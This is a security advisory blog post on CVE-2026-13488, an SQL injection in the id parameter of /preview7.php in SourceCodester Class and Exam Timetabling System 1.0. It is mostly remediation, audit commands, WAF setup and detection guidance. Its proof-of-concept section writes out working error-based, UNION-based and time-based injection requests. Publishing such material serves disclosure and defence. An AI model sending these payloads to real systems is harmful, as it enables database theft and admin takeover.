Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsTraining
StudyProjectsNewsletterHire MeAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Training
Study
Projects
Newsletter
Hire Me
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

1794+ Articles
149+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Checklists
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-13488: SQL Injection in SourceCodester Timetabling System (/preview7.php)
CVE-2026-13488: SQL Injection in SourceCodester Timetabling System (/preview7.php)
SECURITYHIGHCVE-2026-13488

CVE-2026-13488: SQL Injection in SourceCodester Timetabling System (/preview7.php)

A high-severity SQL injection vulnerability in SourceCodester Class and Exam Timetabling System 1.0 allows unauthenticated attackers to manipulate the...

Dylan H.

Security Team

June 28, 2026
4 min read

Affected Products

  • SourceCodester Class and Exam Timetabling System 1.0

Executive Summary

CVE-2026-13488 is a high-severity SQL injection vulnerability in SourceCodester Class and Exam Timetabling System 1.0. The vulnerability affects the /preview7.php endpoint, where the id parameter is not properly sanitized before being used in a database query. An unauthenticated remote attacker can exploit this flaw to access or manipulate all data in the underlying database.

CVSS Score: 7.3 (High)

This CVE was disclosed on the same day as CVE-2026-13487, which affects a different endpoint (/archive.php) in the same product, indicating widespread SQL injection exposure across the application.


Vulnerability Overview

AttributeValue
CVE IDCVE-2026-13488
CVSS Score7.3 (High)
TypeSQL Injection (CWE-89)
Endpoint/preview7.php
Parameterid
Attack VectorNetwork
AuthenticationNone Required
Disclosure SourceNVD / VDB
Published2026-06-28

Affected Software

ProductVendorAffected Version
Class and Exam Timetabling SystemSourceCodester1.0

Technical Details

The /preview7.php file accepts an id parameter which is used to retrieve a record for preview — likely a timetable entry or exam schedule. The value is not passed through a prepared statement or parameterized query, allowing injection of arbitrary SQL.

Proof-of-Concept Pattern

Standard error-based injection:

GET /preview7.php?id=1' AND EXTRACTVALUE(1,CONCAT(0x7e,database()))-- HTTP/1.1
Host: <target>

UNION-based extraction:

GET /preview7.php?id=0 UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()-- HTTP/1.1
Host: <target>

Time-based blind injection:

GET /preview7.php?id=1' AND SLEEP(5)-- HTTP/1.1
Host: <target>

Potential Impact

ImpactDescription
Full Database ReadDump all tables — students, faculty, schedules, users
Credential ExtractionRetrieve admin password hashes for offline cracking
Data IntegrityINSERT, UPDATE, DELETE operations via stacked queries
Admin TakeoverBypass login by manipulating authentication tables
Lateral MovementIf DB user has FILE privileges, read/write server files

Relationship to CVE-2026-13487

These two CVEs were published within seconds of each other and affect the same product version. The identical CVSS score and attack pattern strongly suggest they were discovered through the same audit or automated scan. This dual-disclosure pattern is a red flag — when an application has SQL injection in two endpoints, it typically has it in many more.

Administrators should treat the entire SourceCodester Timetabling System 1.0 codebase as vulnerable and audit all parameters across all endpoints, not just those named in these CVEs.


Remediation

Immediate Mitigation

  1. Disable internet access to the timetabling application if it is externally reachable.
  2. Firewall the web server to allow only trusted internal IP ranges.
  3. Enable database query logging and review for suspicious patterns.

Code-Level Fix

// VULNERABLE
$id = $_GET['id'];
$result = mysqli_query($conn, "SELECT * FROM previews WHERE id = '$id'");
 
// SECURE — prepared statement
$stmt = $conn->prepare("SELECT * FROM previews WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();

Application-Wide Audit

Given the systemic nature of the issue, conduct a full audit:

# Search for unsanitized query construction
grep -rn "\$_GET\|\$_POST\|\$_REQUEST" /path/to/app/*.php | grep -i "query\|sql\|select\|insert\|update\|delete"
 
# Find all parameter usages without prepared statements
grep -rn "mysqli_query\|mysql_query" /path/to/app/ | grep -v "prepare\|bind_param"

Deploy a WAF

Use ModSecurity with the OWASP Core Rule Set (CRS) to block SQL injection attempts:

# Apache — enable ModSecurity
SecRuleEngine On
Include /etc/modsecurity/owasp-crs/crs-setup.conf
Include /etc/modsecurity/owasp-crs/rules/*.conf

Detection Indicators

IndicatorDescription
id param containing SQL syntax', --, UNION, SELECT, SLEEP
HTTP 500 errors from /preview7.phpMay indicate error-based injection probing
Abnormal DB query durationSLEEP()-based blind injection
DB log entries with malformed syntaxDirect evidence of injection attempts

References

  • NVD — CVE-2026-13488
  • CWE-89: SQL Injection
  • OWASP SQL Injection Prevention Cheat Sheet

Related Advisories

  • CVE-2026-13487: SQL Injection in Timetabling System /archive.php
  • CVE-2026-13498: SQL Injection in Restaurant Management System
#CVE#SQL Injection#SourceCodester#Web Security#NVD

Related Articles

CVE-2026-13487: SQL Injection in SourceCodester Timetabling System (/archive.php)

A high-severity SQL injection vulnerability in SourceCodester Class and Exam Timetabling System 1.0 allows unauthenticated attackers to manipulate the...

4 min read

CVE-2026-14771: SQL Injection in SourceCodester Class and Exam Timetabling System

An unauthenticated remote SQL injection vulnerability in SourceCodester's Class and Exam Timetabling System 1.0 allows attackers to manipulate the id parameter in /edit_exam1.php. No patch is available — apply input sanitization immediately.

3 min read

CVE-2026-13521: SQL Injection in SourceCodester Class and Exam Timetabling System

A remotely exploitable SQL injection vulnerability affects SourceCodester Class and Exam Timetabling System 1.0 via the course_year_section parameter in...

3 min read
Back to all Security Alerts